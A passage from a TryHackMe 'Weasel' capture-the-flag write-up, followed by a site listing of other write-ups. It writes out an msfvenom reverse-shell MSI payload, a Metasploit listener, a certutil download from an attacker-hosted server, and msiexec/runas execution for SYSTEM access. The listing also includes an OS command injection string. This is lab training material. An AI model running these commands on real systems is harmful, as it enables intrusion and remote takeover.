msfvenom -p windows/x64/shell_reverse_tcp LHOST=<Your_IP> LPORT=4444 -f msi > cyberiumx.msi

Also let’s create the metasploit listener for the same using following commands:

msfconsole

use exploit/multi/handler

set payload windows/x64/shell_reverse_tcp

set lhost <Your_IP>

set lport 4444

exploit

Now we will create Python3 HTTP server to host the malicious msi file and certutil to download the file on windows as follows:

python3 –m http.server 1234

certutil -urlcache -f http://<Your_IP>:1234/cyberiumx.msi cyberiumx.msi

Let’s execute the malicious msi file in order to get reverse shell using following command:

msiexec /qn /i c:\Users\dev-datasci-lowpriv\cyberiumx.msi

We will find that it will not provide the reverse shell.

We need to run the same command using another windows utility called “runas” which allows you to run any specific command on the behalf of any user whose password you have. We know the password of dev-datasci-lowpriv user so we can simply execute the malicious msi file using runas command as follows and then provide the password for the user:

runas /user:dev-datasci-lowpriv “msiexec /quiet /qn /i C:\Users\dev-datasci-lowpriv\cyberiumx.msi”

Wooooh!!! We got the reverse shell within a few seconds. You can confirm that we are System user using whoami command and can read the contents of root.txt using following command:

type C:\Users\Administrator\Desktop\root.txt

Weasel was another amazing Windows machine by TryHackMe. Getting initial access was pretty simple and pivoting and privilege escalation was very informative.

I hope that you guys enjoyed and find this write-up interesting.
You can check out our other write-ups related to TryHackMe over here.

Happy Pentesting!!!

Team CyberiumX

Cybercrime: Dark Web of Digital Attacks

Introduction

What is Cybercrime?

Top Common Types of Cybercrimes

Impersonation/Identity Theft

Child pornography

SIM swap scams

Website defacement

Phishing Attacks

Cyberstalking

Data breach

Cybersquatting

Cyberbullying

Online Sextortion

Malware and Ransomware

Impact of Cybercrimes

Prevention and Mitigation Strategies

Conclusion

Finding API Key on Grep

Finding First Flag on Grep

Getting Foothold on Grep

Finding Email of Admin on Grep

Finding another Domain on Grep

Finding Admin’s Password on Grep

Finding First Flag on Ra

Finding Second Flag on Ra

Finding Third Flag on Ra

Lab-1 Manipulating WebSocket messages to exploit vulnerabilities

Lab-2 Manipulating the WebSocket handshake to exploit vulnerabilities

Lab-3 Cross-site WebSocket hijacking

Introduction

AI’s Increase in Cyberattacks

The Risks of Cyberattacks Driven by AI

Cyber Security defense Powered by AI

Ethical Aspects of AI-Powered Cyber Security

Conclusion

Overview of Docker

Who Uses Docker?

Architecture of Docker

Installation of Docker

Docker for Penetration Tester

Run Metasploit Framework as a Docker Container

Removing docker images

Run SQLmap as a Docker Container

Run Kali Linux as a Docker Container

Run Parrot OS as a Docker Container

Getting Foothold on Timelapse

Privilege Escalation on Timelapse

Lab 1- OS command injection, simple case

Lab 2- Blind OS command injection with time delays

Lab 3- Blind OS command injection with output redirection

+%26+whoami+>+/var/www/images/a.txt+%26+

Lab 4- Blind OS command injection with out-of-band interaction

Lab 5- Blind OS command injection with out-of-band data exfiltration

Importance of Windows optimization for Cyber Security

1. Clearing windows cache and windows temp files

2. Clearing GPU cache to improve windows gaming performance and storage:

3. Removing old windows updates

4. Removing old programs from windows

5. Removing large files in windows

6. Setting up windows storage sense

Initial Foothold on Weasel

Pivoting on Weasel

Privilege Escalation on Weasel

Book a Demo